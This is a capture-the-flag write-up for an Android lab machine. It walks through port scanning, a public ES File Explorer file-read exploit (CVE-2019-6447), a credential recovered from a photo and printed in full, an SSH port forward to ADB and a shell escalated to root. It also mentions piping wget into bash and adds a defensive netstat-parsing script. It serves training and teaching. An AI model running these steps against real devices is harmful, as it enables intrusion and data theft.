Workflow

Summary
This was a beginner-friendly machine with a steady workflow and no major obstacles. In the enumeration phase all ports had to be scanned in order to identify the correct attack vector. Following that, a simple file traversal exploit against an ES File Explorer server provides credentials after some looking around. These credentials allow an SSH connection to the target server. From there we are able to port forward over SSH to reach a filtered port, piggyback off that connection to use the ADB debugger to connect to the target with elevated privileges, and then expand into Administrator.
Tools used
nmap
autorecon
sshpass
wget
linpeas
ADB
Processes/techniques
File traversal exploit
SSH port forwarding
Android OS ADB and ES File Explorer
References
https://www.cyberciti.biz/faq/unix-linux-check-if-port-is-in-use-command/
https://dev.to/exadra37/android-devices-being-shipped-with-tcp-port-5555-enabled-1ig5
Phase 1 - Enumeration
Starting off with a basic nmap scan we find only two ports.

Diving a little deeper and scanning all the ports reveals a wider attack surface.

Performing an in-depth service scan on the ports listed greatly expands our attack surface once again (see the nmap -sC -sV output below).
└─$ nmap 10.129.209.183 -sC -sV -p 2222,5555,38291,42135,59777
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 12:34 EST
Nmap scan report for 10.129.209.183
Host is up (0.098s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
38291/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:34:51 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Thu, 11 Nov 2021 17:34:51 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Thu, 11 Nov 2021 17:34:57 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:35:12 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:34:57 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:35:12 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:35:12 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:35:12 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.91%I=7%D=11/11%Time=618D543C%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port38291-TCP:V=7.91%I=7%D=11/11%Time=618D543B%P=x86_64-pc-linux-gnu
Phase 2 - ES File Explorer enumeration & pivot into initial foothold
Noticing the banner "ES File Explorer", I jumped over to Google and researched the purpose and function of ES File Explorer. I looked for vulnerabilities on exploit-db and came across the one below; it actually worked with a copy + paste on the first go, no modification required.
The exploit allows the individual to read files and nothing more. Several command line arguments are available to us.
Available commands
listFiles
listPics
listVideos
listApps
listAppsSystem
listAppsPhone
listAppsSdcard
listAppsAll
getFile
getDeviceInfo
After much searching around I finally listed the "Pics", where I found a photo of credentials. Here is the output:
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
Here we see the photo creds.jpg, which is exactly what we need to progress!

kristi:Kr1sT!5h@Rp3xPl0r3!
Phase 3 - Initial foothold
We connect in with SSH over port 2222 as kristi and land a very limited shell.
Looking around, we eventually make our way into the sdcard directory and find user.txt.


I was able to upload linpeas; however, the file is restricted to root every time and I cannot change the permissions. Having failed with my previous attempt to execute linpeas, I attempted to execute it directly in memory (with wget | bash) and this did not work either. From here I attempted to escalate the shell to python and this did not work.
Permissions are not on our side, as seen in the photo below.

Manual enumeration
At this point I pulled up some Linux privilege escalation manual enumeration sheets; uname -a helped clarify the version of Android we were running. Netstat, however, provided a great clue for our next move.
127|:/ $ uname -a
Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64
:/ $
netstat was not working but netstat -tulpn worked!

Seeing that port 5555 was open and listening on the inside while being filtered from the outside, I eventually clued in, after far too long, that this was something worth investigating.
Looking up android port 5555 we learn that Android devices are actually being shipped with port TCP 5555 enabled.
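The netstat finding above is the kind of thing worth checking for systematically. The following is an added example (not part of the original write-up) that parses constructed `netstat -tulpn` output in the layout used on the Android target and flags listeners on the ports this box's enumeration turned up, distinguishing loopback-only binds from ones on all interfaces; the PIDs and program names in the sample are made up.

```python
from typing import List, NamedTuple

# Constructed sample in the net-tools/toybox `netstat -tulpn` layout that the
# write-up used on the Android target; PIDs and program names are made up.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program Name
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      2345/sshd
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN      1234/adbd
tcp        0      0 0.0.0.0:42135           0.0.0.0:*               LISTEN      3456/com.estrongs.android.pop
tcp        0      0 0.0.0.0:59777           0.0.0.0:*               LISTEN      3456/com.estrongs.android.pop
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN      4567/local_debug
udp        0      0 0.0.0.0:68              0.0.0.0:*                           789/dhcpcd
"""

# Ports this box's enumeration turned up and why each one matters.
RISKY_PORTS = {
    5555: "adbd over TCP: a shell with no authentication once reachable",
    59777: "ES File Explorer JSON API (CVE-2019-6447): arbitrary file read",
    42135: "ES File Explorer name-response httpd",
}

class Listener(NamedTuple):
    proto: str
    addr: str
    port: int
    program: str

def parse_netstat(text: str) -> List[Listener]:
    """Return TCP sockets in LISTEN state; headers and UDP lines are skipped."""
    listeners = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith("tcp") or f[5] != "LISTEN":
            continue
        addr, _, port = f[3].rpartition(":")      # handles "0.0.0.0:5555" and ":::5555"
        program = f[6].partition("/")[2] if len(f) > 6 else "?"
        listeners.append(Listener(f[0], addr, int(port), program))
    return listeners

def flag_risky(listeners: List[Listener]) -> dict:
    """Risky ports bound to a non-loopback address, keyed by port. A host firewall
    may still filter them from outside (nmap showed 5555 as 'filtered'), so a hit
    means 'reachable on the device', not necessarily 'reachable from the network'."""
    findings = {}
    for l in listeners:
        if l.port in RISKY_PORTS and l.addr not in ("127.0.0.1", "::1"):
            findings[l.port] = f"{l.program} on {l.addr}: {RISKY_PORTS[l.port]}"
    return findings
```

Running flag_risky(parse_netstat(SAMPLE_NETSTAT)) reports 5555, 42135 and 59777 and ignores the loopback-only debug listener; feed it the real output of netstat -tulpn from a device to audit it.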
Phase 4 - Escalate to root
For this phase of the engagement our goal is to access port 5555, which has to be done through the ADB debugger. This was very interesting, as I guess all Android devices are designed to communicate with an ADB debugger as a way of providing highly customizable features and system commands for developers.
To forward the port I had initially tried plain SSH, which caused many issues, so I switched to sshpass, allowing me to supply the password automatically. Sometimes if a password prompt is required it can time out your session while operating out of the command line; the command line cannot always receive a popup designed for the desktop (GUI). sshpass solves this (note that -p leaves the password visible in the process list and shell history; -e or -f are the quieter options).
sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -L5555:localhost:5555 kristi@10.129.209.183 -p 2222
From here we connect the ADB debugger, which we installed from the command line, to our target through the tunnel (port 2222 -> 5555); with the -L forward from the previous step in place, the same service is also reachable as localhost:5555. This is performed with the adb connect command.
adb connect 10.129.209.183:5555

From here we confirm that ADB is connected with the following command.
adb devices
Then we call an Android system shell with the ADB command below.
adb shell
Phase 4 - Root
This was actually quite embarrassing: just using the su command to switch from the shell user to root won the day.